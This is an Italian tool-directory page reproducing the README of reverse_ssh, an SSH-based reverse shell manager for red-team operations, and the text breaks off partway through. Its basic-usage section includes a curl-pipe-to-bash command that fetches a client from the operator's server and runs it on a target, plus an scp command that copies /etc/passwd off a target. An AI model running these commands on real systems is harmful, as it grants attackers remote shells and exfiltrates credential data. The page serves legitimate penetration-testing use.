Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
reverse_ssh — Strumento di gestione di reverse shell basato su SSH con supporto nativo per SCP/SFTP, protocolli di trasporto multipli, generazione di DLL per Windows ed esecuzione fileless per operazioni red team. | Kitploit
Strumenti/GitHubGitHub/nhas/reverse_ssh
ShellcodeGenerazione di Shellcode
GitHubnhas/reverse_ssh

reverse_ssh

Strumento di gestione di reverse shell basato su SSH con supporto nativo per SCP/SFTP, protocolli di trasporto multipli, generazione di DLL per Windows ed esecuzione fileless per operazioni red team.

Vedi Repository
1.4k1843523 giorni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Reverse SSH

icon
(Credito artistico a https://www.instagram.com/smart.hedgehog.art/)

Vuoi usare SSH per le reverse shell? Ora puoi.

  • Gestisci e connettiti a reverse shell con la sintassi nativa di SSH
  • Dynamic, local e remote forwarding
  • Implementazioni native di SCP e SFTP per recuperare file dai tuoi target
  • Shell Windows completa
  • Molteplici trasporti di rete, come http, websockets, tls e altri
  • Autenticazione reciproca client e server per creare canali di controllo ad alta fiducia E altro ancora!```text +----------------+ +---------+ | | | | | | +---------+ RSSH | | Reverse | | | Client | | SSH server | | | | | | | +---------+ +---------+ | | | | | | | | | Human | SSH | | SSH | +---------+ | Client +-------->+ <-----------------+ | | | | | | | RSSH | +---------+ | | | | Client | | | | | | | | | +---------+ | | | | | | +----------------+ | +---------+ | | | | | RSSH | +---------+ Client | | | +---------+
https://github.com/user-attachments/assets/11dc8d14-59f1-4bdd-9503-b70f8a0d2db1


- [SSH Inverso](#reverse-ssh)
  - [TL;DR](#tldr)
    - [Configurazione](#setup)
    - [Utilizzo di base](#basic-usage)
  - [Sponsor](#sponsors)
    - [Individui](#individuals)
    - [Aziende](#companies)
  - [Caratteristiche avanzate](#fancy-features)
    - [Privilegi](#privileges)
    - [Connessione automatica di ritorno](#automatic-connect-back)
    - [Download di reverse shell (generazione client e server HTTP integrato)](#reverse-shell-download-client-generation-and-in-built-http-server)
    - [Trasporti alternativi (HTTP/Websocket/TLS)](#alternate-transports-httpwebsocketstls)
    - [Autocompletamento Bash](#bash-autocomplete)
    - [Generazione DLL Windows](#windows-dll-generation)
    - [Sottosistemi SSH](#ssh-subsystems)
      - [Tutti](#all)
      - [Linux](#linux)
      - [Windows](#windows)
    - [Integrazione servizio Windows](#windows-service-integration)
    - [Supporto completo shell Windows](#full-windows-shell-support)
    - [Webhook](#webhooks)
    - [Tun (VPN)](#tun-vpn)
    - [Esecuzione senza file (i client supportano il download dinamico di eseguibili da eseguire come shell)](#fileless-execution-clients-support-dynamically-downloading-executables-to-execute-as-shell)
      - [Schemi URI supportati](#supported-uri-schemes)
- [Aiuto](#help)
  - [Windows](#windows-help)
    - [SFTP](#windows-and-sftp)
    - [Errori di avvio sessione (0xc0000142)](#session-spawn-errors-0xc0000142)
  - [Il server avviato con `--insecure` ha ancora `Failed to handshake`](#server-started-with---insecure-still-has-failed-to-handshake)
  - [Primo piano vs Sfondo](#foreground-vs-background)
- [Donazioni, Supporto o Restituzione](#donations-support-or-giving-back)

## TL;DR

### Configurazione

Si consiglia il rilascio Docker in quanto include la versione corretta di golang e un compilatore cross per Windows.```sh
# Start the server
docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v ./data:/data reversessh/reverse_ssh

o docker compose:```yaml services: reversessh: image: reversessh/reverse_ssh ports: - "3232:2222" environment: - EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232 - RSSH_CONSOLE_LABEL=c2.label - RSSH_LOG_LEVEL=INFO # DISABLED, INFO, WARNING, ERROR, FATAL - SEED_AUTHORIZED_KEYS=${SSH_PUBLIC_KEY} volumes: - ./data:/data

### Uso base```sh
# Connect to the server console
ssh your.rssh.server.internal -p 3232


# List all server console commands
catcher$ help

# Build a new client and host it on the in-built webserver
catcher$ link
http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25


# curl or wget this binary to a target system then execute it,
curl http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25.sh |  bash

# then we can then list what clients are connected
catcher$ ls
                                 Targets
+------------------------------------------+-----------------------------------+
| IDs                                      | Version                           |
+------------------------------------------+-----------------------------------+
| a0baa1631fe7cfbbfae34eb7a66d46c00d2a161e | SSH-v2.2.3-1-gdf5a3f8-linux_amd64 |
| fe6c52029e37185e4c7d512edd67a6c7694e2995 |                                   |
| dummy.machine                            |                                   |
| 192.168.0.11:34542                       |                                   |
+------------------------------------------+-----------------------------------+

Tutti i comandi supportano il flag -h per fornire aiuto.

Poi i tipici comandi ssh funzionano, basta specificare il tuo server rssh come host di salto.```sh

Connect to full shell

ssh -J your.rssh.server.internal:3232 dummy.machine

Start remote forward

ssh -R 1234:localhost:1234 -J your.rssh.server.internal:3232 dummy.machine

Start dynamic forward

ssh -D 9050 -J your.rssh.server.internal:3232 dummy.machine

SCP

scp -J your.rssh.server.internal:3232 dummy.machine:/etc/passwd .

## Sponsor

Un enorme ringraziamento alle seguenti persone per aver donato al progetto RSSH e reso possibile tutto questo lavoro!

### Individui
[chikamobina](https://github.com/chikamobina) per le loro generose donazioni!  
[wrighterase (ctrlzero)](https://github.com/wrighterase) per le loro pull request e donazione!

### Aziende

[Carapace](https://carapace.nz/) è una società di consulenza sulla sicurezza con sede in Nuova Zelanda, con un team di persone estremamente talentuoso!  
[<img src="https://assets.kitploit.com/production/public/readmes/5627/b077b138b5108d69a3bcb10eea9d5f195914c9fb4653689923b3a10a1ee38a64.png">](https://carapace.nz/)

## Funzionalità avanzate

### Privilegi
Il server RSSH supporta privilegi utente molto basici, dove gli utenti trovati nella cartella `data-directory`/`keys` (specificata tramite `--datadir`) ad esempio `data-directory/keys/jim` verranno assegnati come "utente" in grado di vedere solo i client che sono pubblici (trovati nel file authorized_controllee_keys senza un tag `owners`, o con un tag `owners` vuoto) o specificamente assegnati a loro, ad esempio `owners="jim"`.

Questo può essere cambiato in fase di esecuzione tramite un utente che condivide l'accesso a un client di sua proprietà con il comando `access`, o un amministratore del server. Per impostazione predefinita, qualsiasi chiave pubblica trovata nel file `authorized_keys` sarà contrassegnata come amministratore per mantenere la compatibilità all'indietro.
Qualsiasi modifica apportata dal comando `access` non persisterà al riavvio del server, e ciò richiederà la modifica del file `authorized_controllee_keys` per quel client specifico.

### Connessione di ritorno automatica
Scarica lo strumento